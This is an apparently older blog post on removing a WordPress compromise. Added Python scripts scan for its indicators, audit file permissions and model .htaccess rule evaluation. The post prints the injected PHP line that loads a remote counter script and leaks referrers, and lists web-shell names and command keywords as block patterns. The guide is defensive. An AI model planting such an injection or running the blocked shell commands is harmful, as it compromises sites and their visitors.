PHPRemoteView Hack: What it is, and how to remove it

Aug 7, 2011

PHPRemoteView
(image courtesy tbogard.com)

What is the PHPRemoteView hack? It is a WordPress compromise that begins with the attackers gaining write access to your WordPress directory. I did not take a screenshot of it myself, but I was dumb enough to fall for it. When you open the WordPress administration directory it shows a prompt that looks like HTTP authentication, and entering your username and password displays a message linking to a page in another language.

Normally, I do not fall for hacks, but I fell for this and I was pretty disappointed.

I learned that this hack was caused by a security vulnerability in timthumb.php (a thumbnail-fetching script); I was susceptible because I had not updated my copy of timthumb.php.

I scoured the Internet and finally found a fix.

First, in your WordPress installation's index.php, remove the following line, which the hack added:

echo '<script type="text/javascript" language="javascript" src="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>';

(Note that the script could also be run from superpuperdomain2.com.)

Then remove the six phony files added by the hackers (check back often, as the list is updated). Back up first, in case your installation actually requires any of these files:

/wp-admin/js/config.php
/wp-admin/common.php
/wp-admin/udp.php
/wp-content/udp.php
/wp-content/uploads/feed-file.php
/wp-content/uploads/feed-files.php

Do not try to open any of these files; my antivirus sounded alarms immediately.
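The clean-up above is easier to verify with a script than by eye. The following is an added example, not code from the original post: it checks a WordPress tree for the six file paths listed above and searches every .php file for the injected counter-script tag (matching both superpuperdomain.com and superpuperdomain2.com). Files are only read as text, never executed. The function and variable names are my own, and the sample site built by build_sample_site() is constructed for demonstration.

```python
# Added example (not from the original post): scan a WordPress tree for the
# indicators the post describes. Rogue paths and the injected <script> line
# come from the post; the sample tree built below is constructed.
import re
import tempfile
from pathlib import Path

# Rogue files named in the post, relative to the WordPress root.
ROGUE_FILES = [
    "wp-admin/js/config.php",
    "wp-admin/common.php",
    "wp-admin/udp.php",
    "wp-content/udp.php",
    "wp-content/uploads/feed-file.php",
    "wp-content/uploads/feed-files.php",
]

# The injected echo loads count.php from superpuperdomain.com or
# superpuperdomain2.com; match any host in that family.
INJECTED_SCRIPT = re.compile(
    r"""<script[^>]*src=["']?https?://superpuperdomain\d*\.com/count\.php""",
    re.IGNORECASE,
)

# The line the post says to remove, with the second domain (constructed copy).
INJECTED_LINE = (
    "echo '<script type=\"text/javascript\" language=\"javascript\" "
    "src=\"http://superpuperdomain2.com/count.php?ref='"
    ".urlencode($_SERVER['HTTP_REFERER']) .'\"></script>';"
)


def find_injected_script(php_source: str) -> list[int]:
    """Return the 1-based line numbers in php_source carrying the injected tag."""
    return [
        lineno
        for lineno, line in enumerate(php_source.splitlines(), start=1)
        if INJECTED_SCRIPT.search(line)
    ]


def scan_wordpress(root: str) -> dict:
    """Report which rogue files exist and which PHP files reference count.php.

    Files are read as text only; nothing is executed or included.
    """
    root_path = Path(root)
    present = [rel for rel in ROGUE_FILES if (root_path / rel).is_file()]
    injected = {}
    for php in root_path.rglob("*.php"):
        try:
            text = php.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable file: report nothing rather than crash
        hits = find_injected_script(text)
        if hits:
            injected[str(php.relative_to(root_path))] = hits
    return {"rogue_files": present, "injected_script": injected}


def build_sample_site() -> str:
    """Construct a throwaway WordPress-like tree with one rogue file and an
    index.php carrying the injected line (demonstration data, not a real site)."""
    root = Path(tempfile.mkdtemp(prefix="wp-scan-"))
    (root / "wp-admin" / "js").mkdir(parents=True)
    (root / "wp-content" / "uploads").mkdir(parents=True)
    (root / "wp-admin" / "udp.php").write_text("<?php /* constructed stand-in */ ?>\n")
    (root / "wp-content" / "clean.php").write_text("<?php echo 'fine'; ?>\n")
    (root / "index.php").write_text(
        "<?php\n"
        "define('WP_USE_THEMES', true);\n"
        + INJECTED_LINE + "\n"
        "require('./wp-blog-header.php');\n"
    )
    return str(root)


if __name__ == "__main__":
    report = scan_wordpress(build_sample_site())
    for rel in report["rogue_files"]:
        print(f"rogue file present: {rel}")
    for rel, lines in report["injected_script"].items():
        print(f"injected script in {rel} at line(s) {lines}")
```

Run it against a real installation with scan_wordpress("/path/to/wordpress"); an empty rogue_files list and an empty injected_script mapping mean the indicators from this post are gone, which says nothing about other modifications the attackers may have made.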

I learned my lesson, and upon purging TechSpheria of this hack, I changed about twenty passwords.

To increase your site’s security, make sure you have correct permissions for files and directories.

Folder permissions for all of my WordPress installations are 755 whereas file permissions are 644.

Run these commands to set the correct permissions recursively for your WordPress installation (755 for directories, 644 for files):

find /wordpressdirectory -type d -exec chmod 755 {} +
find /wordpressdirectory -type f -exec chmod 644 {} +
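Setting the modes once is not enough; uploads, plugin updates and FTP clients drift them again. The following is an added example, not the post's own code: it audits a tree against the 755/644 scheme above, lists every entry that deviates, and optionally corrects each entry according to its type rather than applying one mode to everything. Names are my own, and build_sample_tree() constructs a deliberately misconfigured tree for demonstration.

```python
# Added example (not from the original post): audit a WordPress tree against
# 755 for directories and 644 for files, optionally fixing deviations in place.
import os
import stat
import tempfile
from pathlib import Path

DIR_MODE = 0o755   # rwxr-xr-x for directories
FILE_MODE = 0o644  # rw-r--r-- for regular files


def expected_mode(path: Path) -> int:
    return DIR_MODE if path.is_dir() else FILE_MODE


def audit_permissions(root: str, fix: bool = False) -> list[tuple[str, str, str]]:
    """Return (relative path, actual mode, expected mode) for every entry that
    deviates from the scheme. With fix=True the mode is corrected in place.
    Symlinks are skipped so the audit never follows one outside the tree."""
    root_path = Path(root)
    deviations = []
    # Materialise the listing first so chmod calls cannot disturb the walk.
    for path in [root_path, *root_path.rglob("*")]:
        if path.is_symlink():
            continue
        actual = stat.S_IMODE(path.lstat().st_mode)
        wanted = expected_mode(path)
        if actual != wanted:
            deviations.append((str(path.relative_to(root_path)), oct(actual), oct(wanted)))
            if fix:
                os.chmod(path, wanted)
    return deviations


def deviating_paths(root: str) -> list[str]:
    """Just the paths, sorted, for a quick summary."""
    return sorted(p for p, _, _ in audit_permissions(root))


def build_sample_tree() -> str:
    """Constructed tree: a world-writable uploads directory and a 0777 PHP
    file inside it, the kind of thing a careless chmod -R or FTP client leaves."""
    root = Path(tempfile.mkdtemp(prefix="wp-perms-"))
    os.chmod(root, DIR_MODE)
    uploads = root / "wp-content" / "uploads"
    uploads.mkdir(parents=True)
    os.chmod(uploads.parent, DIR_MODE)
    os.chmod(uploads, 0o777)
    good = root / "index.php"
    good.write_text("<?php require('./wp-blog-header.php'); ?>\n")
    os.chmod(good, FILE_MODE)
    bad = uploads / "feed-file.php"
    bad.write_text("<?php /* constructed stand-in */ ?>\n")
    os.chmod(bad, 0o777)
    return str(root)


def demo_fix() -> tuple[list[str], list[str]]:
    """Build the sample tree, record deviations, fix them, audit again."""
    site = build_sample_tree()
    before = deviating_paths(site)
    audit_permissions(site, fix=True)
    after = deviating_paths(site)
    return before, after


if __name__ == "__main__":
    before, after = demo_fix()
    print("deviations before fix:", before)
    print("deviations after fix:", after)
```

Run audit_permissions("/path/to/wordpress") first without fix=True and read the list; a file that legitimately needs a different mode (a cron script, for instance) should be excluded before you let the script change anything.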

I also added this rule in my .htaccess (in my account’s root folder, not inside public_html):

order allow,deny
deny from 91.220
deny from 91.196
deny from superpuperdomain.com
deny from superpuperdomain2.com
allow from all

The malicious script was served from superpuperdomain.com (UPDATE: superpuperdomain2.com has popped up as well). I ran a traceroute on the domains and found their servers' IP addresses. To be safe, I blocked the whole IP ranges (91.220 and 91.196), so they receive a Forbidden notice if they try to access TechSpheria again.

Benoist Rousseau posted additional .htaccess security rules; use them at your own risk:

RewriteCond %{REQUEST_URI} .*((php|my)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC,OR]
RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
RewriteCond %{QUERY_STRING} ^(.*)=/home/(.*)$ [OR]
RewriteCond %{QUERY_STRING} ^work_dir=.*$ [OR]
RewriteCond %{QUERY_STRING} ^command=.*&output.*$ [OR]
RewriteCond %{QUERY_STRING} ^nts_[a-z0-9_]{0,10}=.*$ [OR]
## WARNING ABOUT THIS RULE: IT CAN BREAK YOUR SITE ##
RewriteCond %{QUERY_STRING} ^(.*)cmd=.*$ [OR]
RewriteCond %{QUERY_STRING} ^c=(t|setup|codes)$ [OR]
RewriteCond %{QUERY_STRING} ^act=((about|cmd|selfremove|chbd|trojan|backc|massbrowsersploit|exploits|grablogins|upload.*)|((chmod|f)&f=.*))$ [OR]
RewriteCond %{QUERY_STRING} ^act=(ls|search|fsbuff|encoder|tools|processes|ftpquickbrute|security|sql|eval|update|feedback|cmd|gofile|mkfile)&d=.*$ [OR]
RewriteCond %{QUERY_STRING} ^&?c=(l?v?i?&d=|v&fnot=|setup&ref=|l&r=|d&d=|tree&d|t&d=|e&d=|i&d=|codes|md5crack).*$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)([-_a-z]{1,15})=(ls|cd|cat|rm|mv|vim|chmod|chdir|mkdir|rmdir|pwd|clear|whoami|uname|tar|zip|unzip|tar|gzip|gunzip|grep|more|ln|umask|telnet|ssh|ftp|head|tail|which|mkmode|touch|logname|edit_file|search_text|find_text|php_eval|download_file|ftp_file_down|ftp_file_up|ftp_brute|mail_file|mysql|mysql_dump|db_query)([^a-zA-Z0-9].+)*$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)(wget|shell_exec|passthru|system|exec|popen|proc_open)(.*)$
RewriteRule (.*) - [F]
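Before deploying a block like this it pays to check what it actually matches. Apache evaluates a run of [OR] conditions as one chain that ends at the first condition without [OR], and the chains are ANDed together. In the rules above, the REQUEST_URI test is therefore ORed only with the REQUEST_METHOD test, and that pair is ANDed with the QUERY_STRING chain, so a request whose path matches the listed shell names but whose query string matches nothing is not blocked at all, while a benign query string containing cmd= (the rule the comment warns about) is. The following is an added example, not part of the original post or of Benoist Rousseau's rules: it models mod_rewrite's condition loop in Python, reproduces a subset of the conditions above, and contrasts them with a reordering (method check first, without [OR]) that gives the reading the rules appear to intend. The reordering is my suggestion; the sample requests are constructed.

```python
# Added example (not from the original post): model how mod_rewrite evaluates
# a RewriteCond block, using a subset of the conditions above. Sample requests
# are constructed; FIXED_CONDS is my suggested reordering, not the original.
import re

NC = re.IGNORECASE

# (variable, pattern, flags, ornext) in the order they appear in the .htaccess.
URI_SHELLS = ("REQUEST_URI", r".*((php|my)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml)", NC)
METHOD = ("REQUEST_METHOD", r"(GET|POST)", NC)
Q_WORKDIR = ("QUERY_STRING", r"^work_dir=.*$", 0)
Q_CMD = ("QUERY_STRING", r"^(.*)cmd=.*$", 0)  # the rule the comment warns about
Q_FUNCS = ("QUERY_STRING", r"^(.*)(wget|shell_exec|passthru|system|exec|popen|proc_open)(.*)$", 0)

# As written on the page: URI [OR] METHOD, then the query-string chain.
CONDS = [(*URI_SHELLS, True), (*METHOD, False),
         (*Q_WORKDIR, True), (*Q_CMD, True), (*Q_FUNCS, False)]

# Suggested reordering: METHOD stands alone (ANDed), everything else is one OR chain.
FIXED_CONDS = [(*METHOD, False),
               (*URI_SHELLS, True), (*Q_WORKDIR, True), (*Q_CMD, True), (*Q_FUNCS, False)]


def evaluate(conds, env) -> bool:
    """Replicate mod_rewrite's condition loop: an [OR] condition that fails
    moves on to the next; one that succeeds skips the rest of its chain; a
    condition without [OR] that fails rejects the rule. RewriteCond matching
    is unanchored, which re.search mirrors."""
    i = 0
    while i < len(conds):
        var, pattern, flags, ornext = conds[i]
        matched = re.search(pattern, env.get(var, ""), flags) is not None
        if ornext:
            if matched:
                # Jump to the condition that closes this OR chain.
                while i < len(conds) and conds[i][3]:
                    i += 1
        elif not matched:
            return False
        i += 1
    return True


def is_forbidden(conds, method: str, uri: str, query: str = "") -> bool:
    """True when RewriteRule (.*) - [F] would fire for this request."""
    env = {"REQUEST_METHOD": method, "REQUEST_URI": uri, "QUERY_STRING": query}
    return evaluate(conds, env)


if __name__ == "__main__":
    # Constructed requests: a listed shell filename with no query string, and
    # an ordinary page with a benign parameter that happens to end in "cmd".
    cases = [("GET", "/wp-admin/c99.php", ""),
             ("GET", "/index.php", "p=12&subcmd=preview"),
             ("GET", "/index.php", "p=12"),
             ("GET", "/index.php", "work_dir=/tmp")]
    for method, uri, query in cases:
        print(f"{method} {uri}?{query}: as written={is_forbidden(CONDS, method, uri, query)}"
              f" reordered={is_forbidden(FIXED_CONDS, method, uri, query)}")
```

The second case shows why the comment warns about the cmd= rule: any query string containing cmd= anywhere, including inside a longer parameter name, is refused. The first case shows the chaining problem: with the conditions in the original order the shell-name check never blocks on its own. Adjust the ordering, or drop the method condition entirely, and re-run the model against your site's real query strings before enabling the rules.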

Remember to keep your plugins and code updated, and use different passwords for all your sites; keeping a secure WordPress installation is vital to everything.

(via T. Bogard and Benoist Rousseau)

UPDATE 1:
Added /wp-content/udp.php to the list of malicious files.

UPDATE 2:
/wp-content/udp.php can also be located in /wp-admin/udp.php. Check both /wp-content/ and /wp-admin/ for udp.php.

UPDATE 3:
Both /wp-content/udp.php and /wp-admin/udp.php are present and malicious. Remove them both.

UPDATE 4:
Added two files: /wp-content/uploads/feed-file.php and /wp-content/uploads/feed-files.php to the list.

UPDATE 5:
Added 91.196 to the deny IP list since superpuperdomain2.com has popped up.